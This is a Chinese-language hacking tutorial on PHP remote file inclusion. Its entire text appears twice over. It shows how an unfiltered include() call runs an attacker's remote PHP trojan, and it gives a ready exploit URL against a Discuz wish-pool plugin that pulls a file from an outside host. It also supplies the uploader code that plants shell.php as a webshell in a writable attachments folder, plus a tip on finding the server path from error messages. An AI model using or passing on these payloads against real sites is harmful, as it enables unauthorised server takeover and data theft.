假设http://www.2cto.com/主页文件index.php的代码如下:
<?
include($page);
?>
由于$page变量缺少充分过滤,没有判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量, 让以web权限执行我们的远程文件.
这样我们可以提交:
http://www.2cto.com/index.php?page=http://远程服务器/文件名称
我们只要把远程文件设为我们的PHP木马,这样就可以得到一个Webshell。
再看discuz许愿板的远程文件包含漏洞:
许愿池插件的wish.php文件出的问题:
require $discuz_root../include/discuzcode.func.php;
变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.wang1.cn/wyt.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里wyt.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"./attachments/shell.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.wang1.cn/wyt.txt ,看错误提示信息,然后修改shell.txt中的路径即可。 shell.php就是你上传的shell的名字。
unix设置比较BT,./attachments/ 一般这个目录是可写的
假设http://www.2cto.com/主页文件index.php的代码如下:
<?
include($page);
?>
由于$page变量缺少充分过滤,没有判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量, 让以web权限执行我们的远程文件.
这样我们可以提交:
http://www.2cto.com/index.php?page=http://远程服务器/文件名称
我们只要把远程文件设为我们的PHP木马,这样就可以得到一个Webshell。
再看discuz许愿板的远程文件包含漏洞:
许愿池插件的wish.php文件出的问题:
require $discuz_root../include/discuzcode.func.php;
变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.wang1.cn/wyt.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里wyt.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"./attachments/shell.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.wang1.cn/wyt.txt ,看错误提示信息,然后修改shell.txt中的路径即可。 shell.php就是你上传的shell的名字。
unix设置比较BT,./attachments/ 一般这个目录是可写的
|
